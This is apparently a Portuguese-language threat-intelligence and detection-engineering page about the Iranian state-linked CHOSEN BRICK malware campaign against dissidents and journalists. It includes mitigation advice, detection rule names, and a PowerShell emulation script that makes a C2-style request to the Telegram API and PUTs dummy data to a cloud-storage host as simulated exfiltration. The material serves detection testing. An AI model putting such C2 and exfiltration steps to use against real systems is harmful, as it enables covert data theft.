Alvo cibernético iraniano em dissidentes, ativistas e jornalistas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atores patrocinados pelo estado iraniano estão usando o malware CHOSEN BRICK para atingir dissidentes, ativistas e jornalistas em todo o mundo. O malware é entregue por meio de engenharia social em plataformas como WhatsApp e Telegram, muitas vezes disfarçado como aplicativos ou arquivos legítimos. Uma vez instalado, o CHOSEN BRICK suporta roubo de dados, gravação de microfone e eliminação do sistema por meio de comando e controle baseado no Telegram.
Investigação
A investigação identificou um padrão recorrente de engenharia social seguido pela implantação do CHOSEN BRICK em sistemas Windows. Os analistas observaram o malware usando bots do Telegram para comunicações C2 e serviços de armazenamento em nuvem para a exfiltração de dados. A persistência é estabelecida por meio de chaves específicas do registro Run, enquanto exclusões do Microsoft Defender são adicionadas para ajudar a evadir controles de segurança.
Mitigação
As mitigação recomendadas incluem melhorar a conscientização dos usuários sobre técnicas de engenharia social e evitar software entregue por meio de anexos não solicitados. As organizações também devem aplicar MFA resistente a phishing, implementar listas de permissão de aplicativos e manter o software antivírus atualizado. Monitorar conexões suspeitas ao Telegram e provedores de armazenamento em nuvem conhecidos pode fortalecer ainda mais a detecção.
Resposta
Se a atividade do CHOSEN BRICK for detectada, as organizações devem trabalhar com seus fornecedores de TI para revisar os logs de endpoints para as chaves de registro e caminhos de arquivo associados. Tanto os dispositivos corporativos quanto os pessoais usados por indivíduos de alto risco devem ser examinados. As equipes de segurança também devem procurar os domínios, nomes de arquivos e outros indicadores técnicos associados à campanha.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)
Uso do CHOSEN BRICK do Telegram e VultrObjects para Comunicações Maliciosas [Conexão de Rede Windows]
Detecção de Persistência do CHOSEN BRICK via Chave Run do Registro [Evento do Registro do Windows]
Execução de Simulação
-
Narrativa & Comandos do Ataque: O adversário busca estabelecer comando e controle (C2) e exfiltrar dados sensíveis. Para evitar antivírus baseado em assinatura tradicional, utiliza serviços web legítimos. Primeiro, o atacante executa um comando para “check-in” com seu servidor C2 via API do Telegram (
api.telegram.org). Em seguida, o atacante simula a exfiltração de um arquivo sensível ao enviá-lo para um bucket de armazenamento hospedado emvultrobjects.com. Essas ações são realizadas por meio de requisições web padrão para se misturar com o tráfego web criptografado legítimo, esperando passar despercebidas e só serem detectadas se IoCs específicos forem conhecidos. -
Script de Teste de Regressão:
# Script de Simulação: Emulação de TTPs do CHOSEN BRICK # Este script simula C2 via Telegram e Exfiltração via VultrObjects $C2_Domain = "api.telegram.org" $Exfil_Domain = "vultrobjects.com" Write-Host "[+] Iniciando Simulação: Emulando TTPs do CHOSEN BRICK..." -ForegroundColor Cyan # 1. Simular Check-in C2 (API Telegram) Write-Host "[*] Passo 1: Simulando check-in C2 para $C2_Domain" -ForegroundColor Yellow try { $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue Write-Host "[+] Solicitação C2 enviada." -ForegroundColor Green } catch { Write-Host "[!] Nota: Conexão falhou (esperada se não houver internet/proxy), mas a telemetria ainda deve ser gerada." -ForegroundColor Gray } # 2. Simular Exfiltração de Dados (VultrObjects) Write-Host "[*] Passo 2: Simulando exfiltração de dados para $Exfil_Domain" -ForegroundColor Yellow $dummy_data = "Estas são informações altamente sensíveis sendo exfiltradas." $dummy_file = "$env:TEMPsensitive_data.txt" $dummy_data | Out-File -FilePath $dummy_file try { # Simulando uma requisição PUT para um endpoint de armazenamento em nuvem Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue Write-Host "[+] Solicitação de exfiltração enviada." -ForegroundColor Green } catch { Write-Host "[!] Nota: Conexão falhou (esperada se não houver internet/proxy), mas a telemetria ainda deve ser gerada." -ForegroundColor Gray } Write-Host "[+] Simulação completa. Verifique logs de proxy no SIEM envolvendo $C2_Domain e $Exfil_Domain." -ForegroundColor Cyan -
Comandos de Limpeza:
# Script de Limpeza $dummy_file = "$env:TEMPsensitive_data.txt" if (Test-Path $dummy_file) { Remove-Item -Path $dummy_file -Force Write-Host "[+] Limpeza: Arquivo de exfiltração simulado removido." -ForegroundColor Green } else { Write-Host "[!] Limpeza: Arquivo simulado não encontrado." -ForegroundColor Yellow }